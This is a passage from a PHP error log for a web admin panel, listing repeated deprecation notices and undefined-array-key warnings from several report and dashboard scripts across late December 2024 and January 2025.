Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Dec-2024 17:23:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Dec-2024 17:23:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Dec-2024 17:40:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Dec-2024 17:40:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Dec-2024 17:43:58 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Dec-2024 17:44:10 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Dec-2024 18:30:23 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Dec-2024 18:30:29 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Dec-2024 18:30:29 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [24-Dec-2024 09:13:54 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Dec-2024 09:14:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [24-Dec-2024 09:14:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [24-Dec-2024 09:14:46 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 10:56:09 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 11:14:41 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 11:57:17 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 11:57:37 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 11:57:38 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 11:59:05 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 12:01:08 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 12:01:29 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 12:01:37 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 12:02:13 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 12:20:57 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 12:21:05 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 12:31:06 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 12:42:09 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 13:56:35 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 14:22:14 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 14:22:17 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 14:26:05 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 14:26:07 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 14:29:39 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 14:29:42 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 14:29:53 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 14:30:36 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 14:32:47 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 14:42:22 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 14:42:35 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 14:42:59 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [06-Jan-2025 14:42:59 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [06-Jan-2025 15:50:15 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 15:50:22 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 15:50:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [06-Jan-2025 15:50:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [06-Jan-2025 16:27:17 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 16:27:38 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [06-Jan-2025 16:27:38 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [06-Jan-2025 16:29:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [06-Jan-2025 16:29:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [06-Jan-2025 16:58:07 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 16:58:18 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [06-Jan-2025 16:58:18 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [06-Jan-2025 18:19:35 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Jan-2025 18:19:38 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [06-Jan-2025 18:19:38 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [06-Jan-2025 18:21:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [06-Jan-2025 18:21:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Jan-2025 09:24:58 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Jan-2025 09:25:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Jan-2025 09:25:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Jan-2025 10:04:19 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Jan-2025 10:04:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Jan-2025 10:04:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Jan-2025 10:09:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Jan-2025 10:09:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Jan-2025 12:02:58 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Jan-2025 12:03:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Jan-2025 12:03:03 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Jan-2025 14:33:59 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Jan-2025 14:34:08 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Jan-2025 14:34:08 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Jan-2025 14:43:05 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Jan-2025 14:43:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Jan-2025 14:43:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Jan-2025 14:52:17 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Jan-2025 14:52:17 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Jan-2025 14:55:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Jan-2025 14:55:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Jan-2025 16:06:09 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Jan-2025 16:06:17 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Jan-2025 16:06:17 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [07-Jan-2025 17:09:53 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [07-Jan-2025 17:09:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [07-Jan-2025 17:09:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Jan-2025 10:19:42 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [08-Jan-2025 10:20:45 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [08-Jan-2025 10:20:57 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [08-Jan-2025 10:21:07 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [08-Jan-2025 10:21:30 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [08-Jan-2025 11:09:13 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [08-Jan-2025 11:58:34 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [08-Jan-2025 11:58:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Jan-2025 11:58:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Jan-2025 14:31:06 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [08-Jan-2025 14:31:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Jan-2025 14:31:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Jan-2025 16:30:35 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [08-Jan-2025 16:30:40 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Jan-2025 16:30:40 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Jan-2025 16:41:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Jan-2025 16:41:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Jan-2025 17:14:37 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [08-Jan-2025 17:14:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Jan-2025 17:14:45 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [08-Jan-2025 17:30:35 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [08-Jan-2025 17:30:35 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [09-Jan-2025 11:56:18 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Jan-2025 11:57:00 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [09-Jan-2025 11:57:00 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [09-Jan-2025 14:18:19 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Jan-2025 14:18:29 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [09-Jan-2025 14:18:29 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [09-Jan-2025 16:34:33 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Jan-2025 16:40:27 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [09-Jan-2025 16:40:36 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [09-Jan-2025 16:40:45 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [09-Jan-2025 16:41:54 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [09-Jan-2025 16:41:56 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [09-Jan-2025 16:42:01 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [09-Jan-2025 16:42:01 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [09-Jan-2025 16:50:10 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Jan-2025 16:50:17 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [09-Jan-2025 16:50:17 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [09-Jan-2025 17:42:22 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Jan-2025 17:42:24 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [09-Jan-2025 17:42:24 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [09-Jan-2025 17:55:08 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [09-Jan-2025 17:55:08 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [09-Jan-2025 18:11:23 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Jan-2025 18:17:41 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Jan-2025 18:17:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [09-Jan-2025 18:17:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Jan-2025 11:33:29 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Jan-2025 11:33:34 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Jan-2025 11:33:34 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Jan-2025 11:41:42 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Jan-2025 11:41:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Jan-2025 11:41:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Jan-2025 11:56:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Jan-2025 11:56:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Jan-2025 12:21:40 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Jan-2025 12:23:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Jan-2025 12:23:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Jan-2025 14:30:34 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Jan-2025 14:30:39 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Jan-2025 14:30:39 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Jan-2025 15:47:26 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Jan-2025 15:47:31 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Jan-2025 15:47:31 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Jan-2025 17:50:30 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Jan-2025 17:50:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Jan-2025 17:50:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Jan-2025 18:08:13 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Jan-2025 18:08:17 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in 